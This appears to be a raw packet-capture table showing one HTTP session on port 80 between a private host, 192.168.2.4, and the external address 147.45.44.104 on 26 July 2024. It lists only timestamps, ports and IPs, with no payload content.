Jul 26, 2024 18:56:49.965270996 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.965277910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.965291023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.965301991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.965312958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.965323925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.965334892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.965346098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.965357065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.965365887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.965382099 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.965456009 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.965972900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.965986013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.965996027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.966006041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.966043949 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.966104031 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.007193089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.007210016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.007222891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.007242918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.007262945 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.007275105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.007289886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.007298946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.007298946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.007304907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.007318020 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.007343054 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.007343054 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.023849964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.023866892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.023880005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.023890972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.023902893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.023915052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.023926020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.023942947 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.023974895 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.023982048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.023993969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.023998022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.024019957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.024029970 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.024033070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.024046898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.024056911 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.024056911 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.024060965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.024075031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.024082899 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.024082899 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.024089098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.024101019 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.024104118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.024135113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.024151087 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.024365902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.024384975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.024405956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.024414062 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.024420977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.024432898 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.024435997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.024451971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.024457932 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.024528980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.024657011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.024669886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.024682045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.024693966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.024705887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.024725914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.024789095 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.036289930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.036312103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.036324024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.036410093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.036516905 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.036683083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.036695957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.036708117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.036720037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.036731005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.036770105 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.036853075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.053177118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.053415060 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.053715944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.053729057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.053740978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.053802967 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.053854942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.053867102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.053875923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.053889036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.053890944 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.053982973 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.054091930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.054104090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.054114103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.054124117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.054136038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.054177046 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.054236889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.054429054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.054440975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.054451942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.054462910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.054474115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.054485083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.054495096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.054507017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.054513931 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.054518938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.054533005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.054575920 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.054639101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.055095911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.055109024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.055119991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.055130005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.055143118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.055154085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.055165052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.055172920 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.055176020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.055187941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.055200100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.055211067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.055216074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.055226088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.055237055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.055253029 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.055253983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.055260897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.055262089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.055308104 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.055372953 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.056036949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.056049109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.056061029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.056071043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.056082964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.056092978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.056104898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.056113958 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.056114912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.056128025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.056138992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.056149960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.056160927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.056171894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.056176901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.056184053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.056195974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.056206942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.056217909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.056237936 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.056303024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.056960106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.056972980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.056983948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.056994915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.057007074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.057018042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.057029963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.057039022 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.057044029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.057056904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.057070017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.057084084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.057101011 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.057163954 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.098695040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.098735094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.098746061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.098751068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.098762035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.098773956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.098781109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.098838091 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.098858118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.106705904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.106803894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.106816053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.106867075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.106903076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.106914997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.106925011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.106935978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.106951952 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.106991053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.114856005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.114866972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.114880085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.114933968 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.114999056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.115010023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.115022898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.115034103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.115042925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.115082026 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.115283012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.115294933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.115304947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.115315914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.115325928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.115333080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.115336895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.115349054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.115353107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.115360975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.115361929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.115372896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.115391016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.115417004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.115719080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.115731001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.115741014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.115752935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.115763903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.115788937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.115807056 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.127224922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.127235889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.127248049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.127309084 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.127521038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.127532005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.127542973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.127552986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.127577066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.127595901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.145149946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.145189047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.145209074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.145226002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.145245075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.145262957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.145282984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.145459890 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.145484924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.145503044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.145523071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.145539999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.145558119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.145575047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.145592928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.145593882 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.145612001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.145627022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.145657063 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.145709038 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.145905972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.145919085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.145929098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.145940065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.145957947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.145970106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.145981073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.145986080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.145992994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.146006107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.146015882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.146028042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.146039009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.146050930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.146073103 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.146140099 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.146747112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.146759033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.146769047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.146780014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.146790981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.146801949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.146811962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.146817923 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.146823883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.146836042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.146846056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.146857023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.146867990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.146878004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.146883011 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.146891117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.146903038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.146950006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.147010088 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.147617102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.147629976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.147639990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.147650003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.147660971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.147671938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.147682905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.147689104 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.147696018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.147707939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.147717953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.147728920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.147739887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.147751093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.147761106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.147772074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.147785902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.147815943 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.147871971 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.148348093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.148360014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.148379087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.148391008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.148401976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.148411989 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.148412943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.148427010 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.148437977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.148509979 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.190675020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.190690041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.190701008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.190736055 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.190752983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.190790892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.190818071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.190829039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.190839052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.190871954 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.190871954 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:50.197601080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.197617054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:50.197637081 CEST	80	49757	147.45.44.104	192.168.2.4
